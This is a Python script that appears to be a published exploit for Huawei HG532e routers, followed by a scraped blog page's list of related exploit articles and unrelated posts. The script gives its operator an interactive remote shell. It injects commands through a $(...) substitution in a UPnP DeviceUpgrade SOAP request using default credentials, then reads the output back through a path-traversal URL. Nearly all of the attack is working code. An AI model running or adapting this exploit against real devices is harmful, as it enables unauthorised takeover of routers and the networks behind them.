#!/bin/python

'''

    Author : Rebellion

    Github : @rebe11ion

    Twitter : @rebellion

'''

import urllib2,requests,os,sys

from requests.auth import HTTPDigestAuth

DEFAULT_HEADERS = {"User-Agent": "Mozilla", }

DEFAULT_TIMEOUT = 5

def fetch_url(url):

    global DEFAULT_HEADERS, DEFAULT_TIMEOUT

    request = urllib2.Request(url, headers=DEFAULT_HEADERS)

    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()

    return data

def exploit(ip, path):

    url = "http://%s:37215/icon/../../../%s" % (ip, path)

    data = fetch_url(url)

    return data

def main():

    pwd = "/"

    cmd_path = "/tmp/ccmd"

    pwd_path = "/tmp/cpwd"

    while True:

       targetip = sys.argv[1]

       cmd_ = raw_input("[{}]$ ".format(pwd))

       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)

       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"

       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)

       assert cmd_path.startswith("/"), "An absolute path is required"

       data = exploit(targetip, cmd_path)

       open(cmd_path,"wb").write(data)

       if "cd" in cmd_:

          pass

       elif "clear" in cmd_:

          os.system("clear")

       elif "cat" in cmd_:

          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))

       else:

          if "|" in cmd_:

             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))

          else:

             os.system("cat {}".format(cmd_path))

       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":

    main()

[EXP]Huawei Router HG532e - Command Execution的更多相关文章

  1. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  7. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  8. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  9. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

随机推荐

  1. vi 操作

    vi 3种模式:1命令行模式,2插入模式,3末行模式 Vim启动后直接进入的是命令行模式,命令行模式顾名思义就是可以输入各种命令的意思, 1. 命令行下按i键进入“插入模式”,命令行下按:键进入“末行 ...

  2. AI大道理头尾标识

    标题 点击上方“AI大道理”,选择“置顶”公众号 重磅干货,深入讲解AI大道理 —————— 正文 —————— 浅谈则止,深入理解AI大道理 扫描下方“AI大道理”,选择“关注”公众号 欢迎加入!

  3. 560. Subarray Sum Equals K 求和为k的子数组个数

    [抄题]: Given an array of integers and an integer k, you need to find the total number of continuous s ...

  4. .Net 获取日期所属于一年中的第几周

    关键代码: public static int WeekOfYear(DateTime dt, CultureInfo ci) { //强制设置周一是每周的第一天 return ci.Calendar ...

  5. 3R - 单词数

    lily的好朋友xiaoou333最近很空,他想了一件没有什么意义的事情,就是统计一篇文章里不同单词的总数.下面你的任务是帮助xiaoou333解决这个问题. Input 有多组数据,每组一行,每组就 ...

  6. swap的实现(没有中间变量)

    两数交换最常用的方法 void swap(int &a,int &b) { int temp=a; a=b; b=temp; } 如果没有中间变量temp可以使用呢,还有其他的三种方法 ...

  7. 搭建Fabric网络(四)运行网络

    启动网络 docker-compose -f docker-compose-cli.yaml up -d如果container cli关闭了,可以手动启动 docker start cli 设置环境变 ...

  8. debug,菜鸟必备的求生技能

    突然想写个关于 debug 的文章,来纪念我2天前被自己坑的蠢事…… 前两天,项目的四期送去电科院审查了.因为一些不可描述的原因,我很不喜欢四期.做起来就很烦~临近验收,发现了个比较严重的bug,记录 ...

  9. Oracle使用JDBC进行增删改查 表是否存在

    Oracle使用JDBC进行增删改查 数据库和表 table USERS (   USERNAME VARCHAR2(20) not null,   PASSWORD VARCHAR2(20) ) a ...

  10. MD5加密算法的Java版本

    网上搜索Java实现MD5的资料很多,错误的也很多. 之前编写的一个阿里云直播鉴权原理算法需要用到MD5算法,网上找了几个,都是不行,浪费了时间,现在贴一个,做备用. import java.secu ...